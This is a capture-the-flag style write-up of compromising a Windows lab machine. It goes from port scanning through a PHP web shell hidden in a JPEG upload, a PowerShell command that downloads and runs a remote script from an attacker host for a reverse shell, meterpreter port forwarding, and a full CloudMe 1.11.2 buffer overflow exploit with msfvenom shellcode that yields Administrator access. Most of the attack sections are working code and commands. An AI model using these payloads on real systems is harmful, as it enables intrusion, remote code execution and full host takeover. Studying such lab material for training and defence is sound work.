Enumeration

nmap

# Nmap 7.92 scan initiated Sun Jul  3 11:41:02 2022 as: nmap -sC -sV -T3 -oA nmap-tcp-all-ports -p- -iL ip.txt
Nmap scan report for 10.129.25.107 (10.129.25.107)
Host is up (0.080s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-title: mrb3n's Bro Hut
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul  3 11:44:33 2022 -- 1 IP address (1 host up) scanned in 210.79 seconds

1. A web server is found on port TCP/8080.

   

2. The Apache header hints to Windows Operating System

3. The web server is fuzzed with ffuf and wordlists common.txt and Common-PHP-Filenames.txt in SecLists/Discovery/Web-Content/

4. There are two versions of same website available. One responds on the root directory / , and one on /ex/ directory.

   

5. It appears to be staging/testing website. Further fuzzing reveals interesting page at /ex/upload.php. It appears to be a file upload functionality.

   

6. The source of upload page shows, first field is ext, second field is name, and file browser accept image/* types.

   

User Access

Uploading Web Shell

1. A file rev_update.php with a one line web shell payload <?php system($_GET["cmd"]);?> is uploaded, with filename rev_update and extension php. The webserver displays an error in parsing the file.

   

2. To bypass this behavior, a simple JPEG header can be added to the payload.jpegfile to make it look like an image. Also, the web form makes the following POST request:

   

3. To preserve the payload, the Content-Type in the form needs to be changed from image/jpeg to application/octet-stream. ( Reference)

4. A malicious JPEG can be created with following python script:

   from PIL import Image
      
   # Create a 1x1 JPEG image
   image_ob = Image.new('1', (1,1))             
      
   # Open the file to write the payload to
   payload_file = open("payload.jpeg","wb")
      
   # Save image data.
   image_ob.save(payload_file)
      
   # Append web shell payload
   payload_file.write(b'\n<?php system($_GET["cmd"]);?>\n')
      
   payload_file.close()
   

   

5. To change the Content-Type value in POST data, MITM proxy like BurpSuite can be used.

   

6. On successful write, the web page doesn’t return any error or output.

7. After visiting /ex/rev_update.php, it is found that the payload is successfully written on the web server.

   

   

8. A reverse shell can be achieved by making following request in cmd parameter:

   http://buff.htb/ex/rev_update.php?cmd=powershell -ep bypass iex(iwr http://attacker.htb:7070/Invoke-PowerShell.ps1 -usebasicparsing)
   

   

Privilege Escalation

Enumeration

1. For enumeration, an enumeration script similar to linPEAS can be used. winPEAS does the same job.

2. Analysis of enumeration results reveals the following information:

   1. There’s a listener on 127.0.0.1:8888

   2. An executable file CloudMe_1112.exe is present in Downloads folder.

      

3. The contents of Tasks.bat file are:

   START C:/xampp/xampp_start.exe
   

   It’s the service to start XAMPP server.

4. The CloudMe_1112.exe is a CloudMe version 1.11.2 software, which is vulnerable to Buffer Overflow.

   

5. The Cloud Me service listens on port TCP/8888 by default.

Exploitation

1. Since the web service is listening on private IP, the port has to be forwarded on local machine to achieve exploitation. This can be done by dropping an executable with staged meterpreter reverse shell payload. Metaploit Framework’s meterpreter has the command portfwd, which can be used to forward traffic from local port to remote port over the existing meterpreter session.

   1. Create an executable with the payload.

      

   2. Start a listener in msfconsole

      

   3. Drop the payload on remote host and execute it.

      

   4. Following command in meterpreter session will configure the required port forwarding.

      portfwd add -l 8888 -p 8888 -r 127.0.0.1
      

2. The exploit at exploit-db.com/exploits/48389 is a simple Buffer Overflow POC with NOP Sled. To modify the payload, a new reverse shell with no stager can be created using msfvenom.

   msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.21 LPORT=9092 -b '\x00\x0A\x0D' -f python -v payload
   

3. After placing the output in the poc.py file, the final script looks like:

   # Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
   # Date: 2020-04-27
   # Exploit Author: Andy Bowden
   # Vendor Homepage: https://www.cloudme.com/en
   # Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
   # Version: CloudMe 1.11.2
   # Tested on: Windows 10 x86
      
   #Instructions:
   # Start the CloudMe service and run the script.
      
   import socket
      
   target = "127.0.0.1"
      
   padding1   = b"\x90" * 1052
   EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
   NOPS       = b"\x90" * 30
      
   #msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
      
   payload =  b""
   payload += b"\xd9\xc3\xbe\x48\x8a\x4c\xc5\xd9\x74\x24\xf4\x5f"
   payload += b"\x29\xc9\xb1\x52\x31\x77\x17\x03\x77\x17\x83\x8f"
   payload += b"\x8e\xae\x30\xf3\x67\xac\xbb\x0b\x78\xd1\x32\xee"
   payload += b"\x49\xd1\x21\x7b\xf9\xe1\x22\x29\xf6\x8a\x67\xd9"
   payload += b"\x8d\xff\xaf\xee\x26\xb5\x89\xc1\xb7\xe6\xea\x40"
   payload += b"\x34\xf5\x3e\xa2\x05\x36\x33\xa3\x42\x2b\xbe\xf1"
   payload += b"\x1b\x27\x6d\xe5\x28\x7d\xae\x8e\x63\x93\xb6\x73"
   payload += b"\x33\x92\x97\x22\x4f\xcd\x37\xc5\x9c\x65\x7e\xdd"
   payload += b"\xc1\x40\xc8\x56\x31\x3e\xcb\xbe\x0b\xbf\x60\xff"
   payload += b"\xa3\x32\x78\x38\x03\xad\x0f\x30\x77\x50\x08\x87"
   payload += b"\x05\x8e\x9d\x13\xad\x45\x05\xff\x4f\x89\xd0\x74"
   payload += b"\x43\x66\x96\xd2\x40\x79\x7b\x69\x7c\xf2\x7a\xbd"
   payload += b"\xf4\x40\x59\x19\x5c\x12\xc0\x38\x38\xf5\xfd\x5a"
   payload += b"\xe3\xaa\x5b\x11\x0e\xbe\xd1\x78\x47\x73\xd8\x82"
   payload += b"\x97\x1b\x6b\xf1\xa5\x84\xc7\x9d\x85\x4d\xce\x5a"
   payload += b"\xe9\x67\xb6\xf4\x14\x88\xc7\xdd\xd2\xdc\x97\x75"
   payload += b"\xf2\x5c\x7c\x85\xfb\x88\xd3\xd5\x53\x63\x94\x85"
   payload += b"\x13\xd3\x7c\xcf\x9b\x0c\x9c\xf0\x71\x25\x37\x0b"
   payload += b"\x12\x40\xc2\x1d\xf7\x3c\xd0\x21\xd4\x38\x5d\xc7"
   payload += b"\x70\x51\x08\x50\xed\xc8\x11\x2a\x8c\x15\x8c\x57"
   payload += b"\x8e\x9e\x23\xa8\x41\x57\x49\xba\x36\x97\x04\xe0"
   payload += b"\x91\xa8\xb2\x8c\x7e\x3a\x59\x4c\x08\x27\xf6\x1b"
   payload += b"\x5d\x99\x0f\xc9\x73\x80\xb9\xef\x89\x54\x81\xab"
   payload += b"\x55\xa5\x0c\x32\x1b\x91\x2a\x24\xe5\x1a\x77\x10"
   payload += b"\xb9\x4c\x21\xce\x7f\x27\x83\xb8\x29\x94\x4d\x2c"
   payload += b"\xaf\xd6\x4d\x2a\xb0\x32\x38\xd2\x01\xeb\x7d\xed"
   payload += b"\xae\x7b\x8a\x96\xd2\x1b\x75\x4d\x57\x2b\x3c\xcf"
   payload += b"\xfe\xa4\x99\x9a\x42\xa9\x19\x71\x80\xd4\x99\x73"
   payload += b"\x79\x23\x81\xf6\x7c\x6f\x05\xeb\x0c\xe0\xe0\x0b"
   payload += b"\xa2\x01\x21"
      
   overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
      
   buf = padding1 + EIP + NOPS + payload + overrun
      
   try:
           s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
           s.connect((target,8888))
           s.send(buf)
   except Exception as e:
           print(sys.exc_value)
   

4. The script is executed, and a reverse shell with privileges of Administrator is achieved.

   

The remote host is completely compromised.